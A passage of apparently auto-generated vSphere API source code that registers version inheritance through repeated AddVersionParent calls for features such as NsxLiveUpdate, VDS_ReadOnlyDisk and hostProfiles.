AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version13")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version14")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version15")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version10")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version11")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version12")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version8")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version9")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version6")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version7")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version4")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version5")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version3")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.LiveUpdate")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version4")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version3")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.version.version0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v6_9_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v6_8_7")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version13")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version14")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version15")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version10")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version11")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version12")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version8")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version9")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version6")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version7")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version4")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version5")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version3")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version13")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version14")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version15")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version10")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version11")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version12")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version8")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version9")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version6")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version7")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version4")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version5")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version3")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version4")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version3")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.version.version0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v6_9_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.vVol_datastore_scalability")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v6_8_7")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version13")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version14")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version15")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version10")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version11")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version12")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version8")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version9")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version6")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version7")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version4")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version5")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version3")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version4")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version3")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.version.version0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v6_9_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.AssignHwCompositeDev")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v6_8_7")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version13")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version14")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version15")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version10")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version11")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version12")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version8")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version9")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version6")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version7")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version4")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version5")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version3")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version4")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version3")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version2")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version1")
AddVersionParent("vim.version.v6_8_7", "vmodl.version.version0")
AddVersionParent("vim.version.v6_8_7", "vmodl.version.version1")
AddVersionParent("vim.version.v6_8_7", "vmodl.version.version2")
AddVersionParent("vim.version.v6_8_7", "vim.version.v6_8_7")
AddVersionParent("vim.version.v6_8_7", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v6_8_7", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v6_8_7", "vim.version.version13")
AddVersionParent("vim.version.v6_8_7", "vim.version.version14")
AddVersionParent("vim.version.v6_8_7", "vim.version.version15")
AddVersionParent("vim.version.v6_8_7", "vim.version.version10")
AddVersionParent("vim.version.v6_8_7", "vim.version.version11")
AddVersionParent("vim.version.v6_8_7", "vim.version.version12")
AddVersionParent("vim.version.v6_8_7", "vim.version.version8")
AddVersionParent("vim.version.v6_8_7", "vim.version.version9")
AddVersionParent("vim.version.v6_8_7", "vim.version.version6")
AddVersionParent("vim.version.v6_8_7", "vim.version.version7")
AddVersionParent("vim.version.v6_8_7", "vim.version.version1")
AddVersionParent("vim.version.v6_8_7", "vim.version.version4")
AddVersionParent("vim.version.v6_8_7", "vim.version.version5")
AddVersionParent("vim.version.v6_8_7", "vim.version.version2")
AddVersionParent("vim.version.v6_8_7", "vim.version.version3")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.version.version0")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.version.version1")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.version.version2")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.reflect.version.version1")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.version.version0")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.version.version1")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.version.version2")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.reflect.version.version1")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.version.version0")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.version.version1")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.version.version2")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v8_0_0_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version13")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version14")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version15")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version10")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version11")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version12")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.v7_0")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version8")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version9")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version6")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version7")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version1")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version4")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version5")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version2")
AddVersionParent("vim.version.v8_0_0_0", "vim.version.version3")
AddVersionParent("vim.version.VQAT", "vmodl.query.version.version4")
AddVersionParent("vim.version.VQAT", "vmodl.query.version.version3")
AddVersionParent("vim.version.VQAT", "vmodl.query.version.version2")
AddVersionParent("vim.version.VQAT", "vmodl.query.version.version1")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VQAT", "vmodl.version.version0")
AddVersionParent("vim.version.VQAT", "vmodl.version.version1")
AddVersionParent("vim.version.VQAT", "vmodl.version.version2")
AddVersionParent("vim.version.VQAT", "vim.version.v6_9_1")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VQAT", "vim.version.v6_8_7")
AddVersionParent("vim.version.VQAT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VQAT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VQAT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VQAT", "vim.version.VQAT")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VQAT", "vim.version.version13")
AddVersionParent("vim.version.VQAT", "vim.version.version14")
AddVersionParent("vim.version.VQAT", "vim.version.version15")
AddVersionParent("vim.version.VQAT", "vim.version.version10")
AddVersionParent("vim.version.VQAT", "vim.version.version11")
AddVersionParent("vim.version.VQAT", "vim.version.version12")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VQAT", "vim.version.v7_0")
AddVersionParent("vim.version.VQAT", "vim.version.version8")
AddVersionParent("vim.version.VQAT", "vim.version.version9")
AddVersionParent("vim.version.VQAT", "vim.version.version6")
AddVersionParent("vim.version.VQAT", "vim.version.version7")
AddVersionParent("vim.version.VQAT", "vim.version.version1")
AddVersionParent("vim.version.VQAT", "vim.version.version4")
AddVersionParent("vim.version.VQAT", "vim.version.version5")
AddVersionParent("vim.version.VQAT", "vim.version.version2")
AddVersionParent("vim.version.VQAT", "vim.version.version3")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.query.version.version4")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.query.version.version3")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.query.version.version2")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.query.version.version1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.version.version0")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.version.version1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.version.version2")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v6_9_1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v6_8_7")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.VCDP_NestedFilters")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version13")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version14")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version15")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version10")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version11")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version12")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.v7_0")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version8")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version9")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version6")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version7")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version1")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version4")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version5")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version2")
AddVersionParent("vim.version.VCDP_NestedFilters", "vim.version.version3")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.query.version.version4")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.query.version.version3")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.query.version.version2")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.query.version.version1")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.version.version0")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.version.version1")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.version.version2")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v6_9_1")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v6_8_7")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.nativeSnapshot", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.nativeSnapshot")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version13")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version14")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version15")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version10")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version11")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version12")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.v7_0")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version8")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version9")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version6")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version7")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version1")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version4")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version5")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version2")
AddVersionParent("vim.version.nativeSnapshot", "vim.version.version3")
AddVersionParent("vim.version.hostProfiles", "vmodl.query.version.version4")
AddVersionParent("vim.version.hostProfiles", "vmodl.query.version.version3")
AddVersionParent("vim.version.hostProfiles", "vmodl.query.version.version2")
AddVersionParent("vim.version.hostProfiles", "vmodl.query.version.version1")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hostProfiles", "vmodl.version.version0")
AddVersionParent("vim.version.hostProfiles", "vmodl.version.version1")
AddVersionParent("vim.version.hostProfiles", "vmodl.version.version2")
AddVersionParent("vim.version.hostProfiles", "vim.version.v6_9_1")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hostProfiles", "vim.version.v6_8_7")
AddVersionParent("vim.version.hostProfiles", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hostProfiles", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hostProfiles", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hostProfiles", "vim.version.hostProfiles")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hostProfiles", "vim.version.version13")
AddVersionParent("vim.version.hostProfiles", "vim.version.version14")
AddVersionParent("vim.version.hostProfiles", "vim.version.version15")
AddVersionParent("vim.version.hostProfiles", "vim.version.version10")
AddVersionParent("vim.version.hostProfiles", "vim.version.version11")
AddVersionParent("vim.version.hostProfiles", "vim.version.version12")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hostProfiles", "vim.version.v7_0")
AddVersionParent("vim.version.hostProfiles", "vim.version.version8")
AddVersionParent("vim.version.hostProfiles", "vim.version.version9")
AddVersionParent("vim.version.hostProfiles", "vim.version.version6")
AddVersionParent("vim.version.hostProfiles", "vim.version.version7")
AddVersionParent("vim.version.hostProfiles", "vim.version.version1")
AddVersionParent("vim.version.hostProfiles", "vim.version.version4")
AddVersionParent("vim.version.hostProfiles", "vim.version.version5")
AddVersionParent("vim.version.hostProfiles", "vim.version.version2")
AddVersionParent("vim.version.hostProfiles", "vim.version.version3")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.query.version.version4")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.query.version.version3")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.query.version.version2")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.query.version.version1")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.version.version0")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.version.version1")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.version.version2")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v6_9_1")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v6_8_7")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.GraphicsDRS", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.GraphicsDRS")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version13")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version14")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version15")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version10")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version11")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version12")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.v7_0")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version8")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version9")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version6")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version7")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version1")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version4")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version5")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version2")
AddVersionParent("vim.version.GraphicsDRS", "vim.version.version3")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_3_1", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_3_1", "vmodl.version.version1")
